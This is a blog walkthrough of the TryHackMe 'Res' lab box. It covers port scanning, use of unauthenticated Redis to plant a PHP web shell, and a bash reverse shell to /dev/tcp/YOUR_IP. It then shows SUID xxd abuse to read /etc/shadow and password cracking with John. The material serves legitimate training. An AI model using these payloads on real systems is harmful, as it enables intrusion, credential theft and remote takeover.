The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.
TryHackMe Res Walkthrough
While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
Res is a new box on TryHackMe where you have to hack into a vulnerable database server with an in-memory data-structure in this semi-guided challenge! TryHackMe Res Redis pentesting Walkthrough
Let’s start of by scanning all ports using Nmap:
┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$ sudo nmap -A -T4 -Pn -sV -p- 10.10.43.113 130 ⨯
[sudo] password for hackerboy:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-26 23:32 IST
Nmap scan report for 10.10.43.113
Host is up (0.22s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
6379/tcp open redis Redis key-value store 6.0.7
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint: #www.kumaratuljaiswal.in #www.hackingtruth.in
OS:SCAN(V=7.91%E=4%D=1/26%OT=80%CT=1%CU=44172%PV=Y%DS=2%DC=T%G=Y%TM=60105BB
OS:D%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=105%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST1
OS:1NW7%O6=M505ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
OS:(R=Y%DF=Y%T=40%W=6903%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Network Distance: 2 hops
TRACEROUTE (using port 23/tcp)
HOP RTT ADDRESS
1 224.93 ms 10.8.0.1
2 225.08 ms 10.10.43.113
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 626.03 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$
Looking at the results we have an Apache web server running on port 80 and Redis 6.0.7 which is an in memory data structure store running on port 6379.
Port 80: Apache Web Server:
Let’s checkout the web server on port 80:
OK, so we have the standard Apache landing page. Looking at the source code we can see nothing hidden. I ran a directory scan using Dirsearch to see whether I could find any hidden directories. Unfortunately no hidden directories can be found. Time to move on to port 6379 and enumerate Redis.
Redis is not something I am familiar with so I spent some time Googling and found a good blog on enumerating Redis as below:
To start with we need to download redis-tools, so we can have access to redis-cli:
sudo apt-get install redis-tools
To start redis-tools, from the command line we enter:
redis-cli -h [IP ADDRESS]
By default Redis can be accessed without credentials. However, it can be configured to support only password, or username + password. In our case Redis can be accessed without any credentials. We can check this simply by entering the ‘info’ command.
From the above we can see that we have a potential username: vianka. From the Hack Tricks website we can see that we can gain RCE as follows:
In firefox we can navigate to [IP-ADDRESS]/redis.php:
We can see that redis.php does indeed run phpinfo().
Let’s try this with another php script to run commands:
<? php system($_GET['cmd']); ?>
In redis-cli, we can simply overwrite the previous php file with this code and try RCE.
Let’s see if we can print out the contents of the passwd file on the Linux machine, it is best to change to ‘view-source’ to see the output:
And there we go, we have the full contents of the /etc/passwd file on the screen and again we can see that we have a user vianka. All we need to do now is setup a listener and create a script to run a simple reverse php shell.
To do this I will do the same as above in redis-cli, but we will set test to run the following php reverse shell script.
"<?php exec("/bin/bash -c 'bash -i > /dev/tcp/YOUR_IP/4444 0>&1'"); ?>"
One important point here is that we will need to escape the set test “….” quotes from the php shell script, so we will need to modify our shell code as follows:
To capture the reverse shell I will start a Pwncat listener, as it has a great deal of functionality, a bit like meterpreter, in that we can easily upload and download files for further enumeration of the system, as well as run the built-in privesc scripts.
And we are in as user www-data. In the /home directory we can see user Vianka. Moving to Vianka’s home directory we can see that we have read access to the user.flag, so we can read the flag.
Wait here, so basically i can't clear my terminal if in your case has been same so dont worry we are here to reloved this issue. simple type this command and you will be able to clear your terminal.
export TERM=xterm
The result show a binary xxd with the SUID bit set and the owner is root. We can probably exploit this to read a file with full root privileges. The go to choice fo rlinux binary exploits is GTFOBins.
but all we will find the file with sudo permission with this type of command
find / -perm -u=s -type f 2>/dev/null
Unfortunately we do not have sudo rights, but looking at the info we can read a file as root, as the file as the SUID bit set. I may be possible to read the shadow file and extract the hash for user vianka and we if we can brute force the hash to get the password.
Using this exploit we can print out the contents of the shadow file and copy Vianka hash. If I can brute force the hash using John we can simply SU as user Vianka.
Brute Forcing Vianka’s Hash with John:
To do this we need to create two files, one with the contents of the passwd file and one with the hash of the shadow file, we only need to copy and paste the information for user Vianka. We can then use the ‘unshadow’ command to convert the hash to a format that is readable by John.
echo "content" > local_shadow
echo "content" > local_passwd
unshadow passwd.txt shadow.txt > hash.txt
john --format=sha512crypt --wordlist=/home/hackerboy/Documents/rockyou.txt hash.txt
Now, we have the password for user vianka,so we can simply 'su vianka' to change user to vianka:
And there we have it, the root.txt file is there for the taking. I really enjoyed this box and it was good to learn about Redis, something I had not come across before.
Disclaimer
All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.
- Hacking Truth by Kumar Atul Jaiswal